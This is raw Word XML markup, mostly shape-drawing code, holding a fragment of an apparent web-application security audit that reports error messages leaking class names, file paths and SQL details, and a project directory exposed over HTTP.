                <v:shape id="Shape 1474" o:spid="_x0000_s1037" style="position:absolute;left:36385;top:19716;width:4572;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="457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YX4wAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VjSUkEl1FSi29Jup9zI5JMDsbdrcm/nu3UOhtHu9zNrvJ9OJOzneWFSwXCQji2uqO&#10;GwWn4+FtBcIHZI29ZVLwIA+77exlg4W2I5d0r0IjYgj7AhW0IQyFlL5uyaBf2IE4clfrDIYIXSO1&#10;wzGGm16+J0kmDXYcG1oc6KOl+lb9GAXSZWhrl2T55+lwrOzXpSnPF6Ve59N+DSLQFP7Ff+5vHeen&#10;eQq/38QT5PYJAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAw4mF+MAAAADdAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m9525,l447675,v2630,,4875,930,6735,2778c456270,4638,457200,6890,457200,9525r,123825c457200,135979,456270,138224,454410,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4876,-930,-6736,-2791c929,138224,,135979,,133350l,9525c,6890,929,4638,2789,2778,4649,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,457200,142875"/>
                </v:shape>
                <v:shape id="Shape 1477" o:spid="_x0000_s1038" style="position:absolute;left:53911;top:19716;width:8668;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8667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olwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LSwMx&#10;EL4L/ocwgjebrUgr26alCEJRL7Z68DZsppt9ZLIkY3f7740geJuP7znr7eR7daaYmsAG5rMCFHEV&#10;bMO1gY/j890jqCTIFvvAZOBCCbab66s1ljaM/E7ng9Qqh3Aq0YATGUqtU+XIY5qFgThzpxA9Soax&#10;1jbimMN9r++LYqE9NpwbHA705KjqDt/eQPH69ekWndi3F3uJY6jafSOtMbc3024FSmiSf/Gfe2/z&#10;/IflEn6/ySfozQ8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAR/UaJcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9526,l857250,v2630,,4875,930,6735,2778c865844,4638,866775,6890,866775,9525r,123825c866775,135979,865844,138224,863985,140084v-1860,1861,-4105,2791,-6735,2791l9526,142875v-2631,,-4876,-930,-6736,-2791c930,138224,,135979,1,133350l1,9525c,6890,930,4638,2790,2778,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,866775,142875"/>
                </v:shape>
                <v:shape id="Shape 1480" o:spid="_x0000_s1039" style="position:absolute;top:21431;width:15144;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="15144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JuxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dasJA&#10;EIXvC77DMoI3RTcNpUh0I2KpLe2NRh9gyI75MTsbsltN375zUejdDOfMOd+sN6Pr1I2G0Hg28LRI&#10;QBGX3jZcGTif3uZLUCEiW+w8k4EfCrDJJw9rzKy/85FuRayUhHDI0EAdY59pHcqaHIaF74lFu/jB&#10;YZR1qLQd8C7hrtNpkrxohw1LQ4097Woqr8W3M/DYHtK2sXt7iUU6uleNX937pzGz6bhdgYo0xn/z&#10;3/WHFfznpfDLNzKCzn8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEASKaybsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l1504950,v2630,,4875,930,6735,2778c1513545,4638,1514475,6890,1514475,9525r,123825c1514475,135973,1513545,138212,1511685,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803l,133350,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1514475,142875"/>
                </v:shape>
                <v:shape id="Shape 1483" o:spid="_x0000_s1040" style="position:absolute;left:15811;top:21431;width:13335;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="13335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QcXwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LFLzVjcb6SF1FLBZvohG8DtkxCWZn4+5W03/fLRS8zcf3nMWqM424k/O1ZQXDQQKCuLC6&#10;5lLBKd++zUD4gKyxsUwKfsjDatl7WWCm7YMPdD+GUsQQ9hkqqEJoMyl9UZFBP7AtceQu1hkMEbpS&#10;aoePGG4aOUqSiTRYc2yosKVNRcX1+G0UULqe11/p5H24c+frPp9+Tm+3XKn+a7f+ABGoC0/xv3un&#10;4/zxLIW/b+IJcvkLAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAkGUHF8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l1323975,v2630,,4875,930,6735,2778c1332570,4638,1333499,6890,1333500,9525r,123825c1333499,135973,1332570,138212,1330710,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1333500,142875"/>
                </v:shape>
                <v:shape id="Shape 1486" o:spid="_x0000_s1041" style="position:absolute;left:29813;top:21431;width:4572;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4572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s4zvwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WdEWqdI1lEStere59bGbbss2kJFHrvzeC4G0e73NW+WA6cSXnW8sKvqYJCOLK6pZr&#10;Badj8bkE4QOyxs4yKbiTh3w9+lhhpu2ND3QtQy1iCPsMFTQh9JmUvmrIoJ/anjhyf9YZDBG6WmqH&#10;txhuOjlLklQabDk2NNjTpqHqv7wYBdKlaCuXpIvtqTiWdneuD79npSbj4ecbRKAhvMUv917H+fNl&#10;Cs9v4gly/QAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBpws4zvwAAAN0AAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m9525,l447675,v2631,,4876,930,6736,2778c456271,4638,457200,6890,457200,9525r,123825c457200,135973,456271,138212,454411,140072v-1860,1860,-4105,2791,-6736,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,457200,142875"/>
                </v:shape>
                <v:shape id="Shape 1489" o:spid="_x0000_s1042" style="position:absolute;left:35052;top:21431;width:4667;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4667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ooxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LS8NA&#10;EL4L/odlBC9iNz4qMe22iFjpoQcbX9chO80Gs7MxO23Sf+8Kgrf5+J4zX46+VQfqYxPYwNUkA0Vc&#10;BdtwbeDtdXWZg4qCbLENTAaOFGG5OD2ZY2HDwFs6lFKrFMKxQANOpCu0jpUjj3ESOuLE7ULvURLs&#10;a217HFK4b/V1lt1pjw2nBocdPTqqvsq9N1B+X+zzzcdUnjbv7vPm+PyykvVgzPnZ+DADJTTKv/jP&#10;vbZp/m1+D7/fpBP04gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDOQvooxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l457200,v2630,,4875,930,6735,2778c465795,4638,466725,6890,466725,9525r,123825c466725,135973,465795,138212,463935,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,466725,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CA733A"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6592" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69F8E2FC" wp14:editId="0C28DD3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2551807</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10573</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26575" name="Group 26575"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1404" name="Shape 1404"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126448"/>
                                  <a:pt x="580095" y="128687"/>
                                  <a:pt x="578235" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132407"/>
                                  <a:pt x="574130" y="133338"/>
                                  <a:pt x="5715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19893DD" id="Group 26575" o:spid="_x0000_s1026" style="position:absolute;margin-left:200.95pt;margin-top:-.85pt;width:45.75pt;height:10.5pt;z-index:-251429888" coordsize="5810,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Ul2TAMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1oty0bsAG2WS9EG&#10;TfoBNE1ZAiRRIOmtX9/hSKQWp0GT5OBQnO3Nm+GQ1zenqnQOTMiC1ys3uPJdh9WUb4t6t3J/P99/&#10;SV1HKlJvSclrtnLPTLo368+fro/NkoU85+WWCQec1HJ5bFZurlSz9DxJc1YRecUbVoMw46IiCj7F&#10;ztsKcgTvVemFvp94Ry62jeCUSQm7t63QXaP/LGNU/cwyyZRTrlzApvBX4O9G/3rra7LcCdLkBe1g&#10;kHegqEhRQ1Dr6pYo4uxFceGqKqjgkmfqivLK41lWUIY5QDaBP8nmQfB9g7nslsddY2kCaic8vdst&#10;/XF4EM1T8yiAiWOzAy7wS+dyykSl/wNK54SUnS1l7KQcCpuzNPDDmetQEAVRFM06SmkOvF9Y0fzu&#10;VTvPBPVGUI4NNIfs85cfy/8pJw1DWuUS8n8UTrEF9LEfu05NKuhS1HBwB2lBPUuSXErg62MM2UzJ&#10;ku6lemAcqSaH71K1Pbk1K5KbFT3VZimgs1/t6YYobadR6qVz7GuV21JpacUP7JmjntIFW8x0PU2l&#10;AWevUNZDxdk8mPlwpgaqRoHuNwX9yv6M1eMgGqgDLow3myfRvI24ADkmbyRpGLWScD5PtQjgjH2P&#10;vzq71PcXrV2cRGhng3XtCpiTdDGO1ouQgpeimfxMnLb3deuHUQq0tTZG62VsA5skjifoLPAgTJN0&#10;/g82gMdZjML/46NnOIjC2J+4tWXR53dCV1/i/nBfxDT5tqzY/hlZGJ2XOIFKtNW6BBAnMFB0h10C&#10;D+dQv1b0JjZ0k6HZBcNmf1oWsz8o8TgNk1xLQKs+6CEjHhsNlae9aDBO29fm/KbzYEmcnC/L++gc&#10;2Prh7kWxackla/tczxU8knbWoHY/zcpajx3ggxK42rOSKLwjq0LBnV8WlT43cx9miDk34E3P+na8&#10;4kqdS6ZnU1n/YhnMabyH9IYUu823UjgHom92/EPnpGxy0u12fjtVhIp+tH1WlKV1GaDpyOXd7X14&#10;n3QeOmVtx/BRYS391pJ2aNqXBdzPkLR5XwAp1ggj81pZ+xpeRRhkkK1ebvj2jHcyEgKXH1KDzwDM&#10;o3uy6HfG8Bu1+ofV+i8AAAD//wMAUEsDBBQABgAIAAAAIQACS0yp4AAAAAkBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI9NS8NAEIbvgv9hGcFbu1kTPxKzKaWopyLYCuJtmkyT0OxsyG6T9N+7nvQ4vA/v&#10;+0y+mk0nRhpca1mDWkYgiEtbtVxr+Ny/Lp5AOI9cYWeZNFzIwaq4vsoxq+zEHzTufC1CCbsMNTTe&#10;95mUrmzIoFvanjhkRzsY9OEcalkNOIVy08m7KHqQBlsOCw32tGmoPO3ORsPbhNM6Vi/j9nTcXL73&#10;9+9fW0Va397M62cQnmb/B8OvflCHIjgd7JkrJzoNSaTSgGpYqEcQAUjSOAFxCGQagyxy+f+D4gcA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBpvUl2TAMAAKAJAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQACS0yp4AAAAAkBAAAPAAAAAAAAAAAAAAAA&#10;AKYFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAswYAAAAA&#10;">
                <v:shape id="Shape 1404" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5810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YLwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBG81sSxL3RpFhIJ4qy2It2Ez3d12M1mSuKb99Y0g9DaP9zmrTbK9GMmHzrGGxVyBIK6d&#10;6bjR8PH++vgMIkRkg71j0vBDATbrycMKK+Ou/EbjMTYih3CoUEMb41BJGeqWLIa5G4gz9+m8xZih&#10;b6TxeM3htpdPSpXSYse5ocWBdi3V38eL1bD0J1WUC3U48+9Y9l+UTi4mrWfTtH0BESnFf/HdvTd5&#10;fqEKuH2TT5DrPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDAkpYLwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l571500,v2630,,4875,930,6735,2778c580095,4638,581025,6890,581025,9525r,114300c581025,126448,580095,128687,578235,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CA733A" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Raw exception text returned regardless of </w:t>
      </w:r>
      <w:r w:rsidR="00CA733A" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APP_DEBUG</w:t>
      </w:r>
      <w:r w:rsidR="00CA733A" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> at ten call sites. Observed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74779BDE" w14:textId="6516F14C" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/reports/carts → 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA388C4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message":"Class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> \"App\\Models\\Cart\" not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>found","exception":"Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC28E03" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="397" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "file":"…\\app\\Http\\Controllers\\Api\\ReportController.php","line":23}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CED585" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="40"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUT /customers/1</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> leaked the full SQL statement, database name, table and foreign-key constraint name. Notably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E20D48" w14:textId="78052DE8" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GrnController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> already gated its messages behind </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.debug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">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the correct pattern was known and applied inconsistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09246551" w14:textId="663FB190" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>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The entire project directory served over HTTP.</w:t>
      </w:r>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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
